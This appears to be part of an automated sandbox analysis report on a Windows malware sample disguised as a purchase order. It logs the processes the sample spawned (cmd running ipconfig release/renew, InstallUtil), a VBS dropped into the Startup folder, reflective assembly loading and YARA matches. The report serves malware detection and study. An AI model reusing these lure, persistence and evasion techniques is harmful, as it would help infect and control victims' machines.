                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_072400400_2_07240040
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0725E0580_2_0725E058
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024510205_2_02451020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_024510305_2_02451030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 1144
                      Source: Purchase Order A2409002.scr.exeBinary or memory string: OriginalFilename vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000000.2108940735.0000000000E44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNEW RFQ - 20250982728.exeL vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2323587531.000000000153E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2343301713.0000000006BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEquoi.dll" vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2347345166.000000000736A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNEW RFQ - 20250982728. vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exeBinary or memory string: OriginalFilenameNEW RFQ - 20250982728.exeL vs Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.expl.evad.winEXE@14/3@1/1
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InheritanceFlags.vbsJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4060:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:64:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d41324ff-7a50-40fe-88f6-22d34e8dd365Jump to behavior
                      Source: Purchase Order A2409002.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Purchase Order A2409002.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Purchase Order A2409002.scr.exeReversingLabs: Detection: 68%
                      Source: Purchase Order A2409002.scr.exeVirustotal: Detection: 62%
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile read: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe "C:\Users\user\Desktop\Purchase Order A2409002.scr.exe"
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 1144
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Purchase Order A2409002.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Purchase Order A2409002.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdbfF source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Osymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ((.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbm. source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdbo source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Purchase Order A2409002.scr.exe, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBp; source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbW source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3D source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbrs source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oHP<o8C:\Windows\InstallUtil.pdb- source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: fX&rC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Purchase Order A2409002.scr.exe, Ipedspkgtm.cs.Net Code: Siikxvn System.Reflection.Assembly.Load(byte[])
                      Source: InheritanceFlags.exe.0.dr, Ipedspkgtm.cs.Net Code: Siikxvn System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Purchase Order A2409002.scr.exe.71a0000.13.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Purchase Order A2409002.scr.exe.4e07058.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.Purchase Order A2409002.scr.exe.4cf01b8.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Purchase Order A2409002.scr.exe.4cf01b8.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Purchase Order A2409002.scr.exe.4cf01b8.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Purchase Order A2409002.scr.exe.4cf01b8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Purchase Order A2409002.scr.exe.4cf01b8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Purchase Order A2409002.scr.exe.6fe0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Purchase Order A2409002.scr.exe.6fe0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Purchase Order A2409002.scr.exe.6fe0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Purchase Order A2409002.scr.exe.6fe0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Purchase Order A2409002.scr.exe.6fe0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.6ea0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.4c1f978.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.4c1f978.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.6ea0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.45a89c8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.4458da0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Purchase Order A2409002.scr.exe.43024c8.0.raw.unpack, type: UNPACKEDPE
